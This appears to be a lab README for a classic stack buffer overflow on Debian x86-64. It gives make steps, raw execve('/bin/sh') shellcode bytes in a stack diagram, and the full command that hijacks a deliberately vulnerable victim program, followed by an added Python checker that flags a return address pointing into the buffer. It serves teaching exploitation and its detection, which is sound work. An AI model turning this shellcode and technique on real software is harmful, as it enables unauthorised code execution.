This is based on . This Makefile automates the construction of the attack
code. It has been tested on Debian 10.8 running 4.19.0-13-amd64 and using
gcc (Debian 8.3.0-6) 8.3.0.

1. Compile and test the shellcode:

       make shellcode

   This creates an executable 'shellcode'. When you run the executable,
   you should end up in a shell.

2. Find the start and length of the shellcode:

       make shellcode.hex

   The Makefile looks for the start marker (needle0) and the end marker
   (needle1), calculates the length of the code and rounds it up to the
   next power of 2. It then runs the xxd tool to extract the shellcode
   out of the shellcode executable.

3. Compile and run the victim code:

       make victim
       setarch $(arch) -R ./victim

   You can play with the victim on the command line. There is nothing
   special about it. Well, the setarch command does something special: it
   makes the stack executable (by default, the stack is not executable
   and attempts to process machine code located on the stack will lead
   to a segmentation fault).

4. Grab the address where the buffer is located on the stack and update
   the Makefile if necessary.

5. Create the attack input:

       make attack.bin

                          :  .   .   .   .  :
                          +----------------+
       0x00007fffffffe318 | return address | d0e2 ffff ff7f 0000 ---+
       0x00007fffffffe310 | saved rbp      | 0000 0000 0000 0000    |
                          |----------------|<- rbp (frame pointer)  |
       0x00007fffffffe308 |                | 0000 0000 0000 0000    |
       0x00007fffffffe300 |                | 0000 0000 0000 0000    |
       0x00007fffffffe2f8 |                | 0000 0000 0000 0000    |
       0x00007fffffffe2f0 |                | 0000 0000 0000 0000    |
       0x00007fffffffe2e8 | char name[64]  | 6e2f 7368 00ef bead    |
       0x00007fffffffe2e0 |                | e8ed ffff ff2f 6269    |
       0x00007fffffffe2d8 |                | 4831 f648 31d2 0f05    |
       0x00007fffffffe2d0 |                | eb0e 5f48 31c0 b03b <--+
                          '----------------'<- rsp (stack pointer)

   The shellcode takes up the first 32 bytes of the buffer. The 80 zeroes
   in the printf represent 40 zero bytes, 32 of which fill the rest of
   the buffer, and the remaining 8 overwrite the saved location of the
   RBP register. The next 8 bytes overwrite the return address and point
   to the beginning of the buffer, where our shellcode lies.

6. Run the attack:

       make attack

       ( ( cat shellcode.hex ; printf %080d 0 ; echo $a ) | xxd -r -p ; cat ) \
           | setarch $(arch) -R ./victim
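
Added example (not part of the original README or its Makefile): a small Python check that re-reads the stack rows from the diagram in step 5 and confirms the byte accounting described there, including the telltale sign an analyst looks for in a crash or memory dump: a saved return address that points back into the frame's own buffer. The function names are hypothetical, and it assumes each row shows 8 bytes in memory order, as xxd prints them.

```python
import struct

# Rows copied from the stack diagram in step 5: address, then 8 bytes in memory order.
DUMP = """
0x00007fffffffe2d0 eb0e 5f48 31c0 b03b
0x00007fffffffe2d8 4831 f648 31d2 0f05
0x00007fffffffe2e0 e8ed ffff ff2f 6269
0x00007fffffffe2e8 6e2f 7368 00ef bead
0x00007fffffffe2f0 0000 0000 0000 0000
0x00007fffffffe2f8 0000 0000 0000 0000
0x00007fffffffe300 0000 0000 0000 0000
0x00007fffffffe308 0000 0000 0000 0000
0x00007fffffffe310 0000 0000 0000 0000
0x00007fffffffe318 d0e2 ffff ff7f 0000
"""
BUF_LEN = 64  # char name[64], as labelled in the diagram


def parse_dump(text):
    """Return (lowest address, contiguous bytes) for rows of 8 bytes each."""
    rows = sorted((int(a, 16), bytes.fromhex("".join(w)))
                  for a, *w in (l.split() for l in text.splitlines() if l.strip()))
    base = rows[0][0]
    for i, (addr, data) in enumerate(rows):
        if addr != base + 8 * i or len(data) != 8:
            raise ValueError(f"gap or short row at {addr:#x}")
    return base, b"".join(data for _, data in rows)


def analyse(text, buf_len=BUF_LEN):
    """Decode the frame: buffer, saved rbp, return address (little-endian)."""
    base, mem = parse_dump(text)
    saved_rbp, ret = struct.unpack_from("<QQ", mem, buf_len)
    return {
        "buffer": base,
        "input_len": len(mem),                             # bytes fed to the victim
        "code_len": len(mem[:buf_len].rstrip(b"\x00")),    # non-zero prefix of buffer
        "saved_rbp": saved_rbp,
        "ret": ret,
        "ret_offset": buf_len + 8,                         # buffer + saved rbp
        "ret_in_buffer": base <= ret < base + buf_len,     # the anomaly to flag
    }


if __name__ == "__main__":
    for key, value in analyse(DUMP).items():
        print(f"{key:14} {value:#x}" if isinstance(value, int) else f"{key:14} {value}")
```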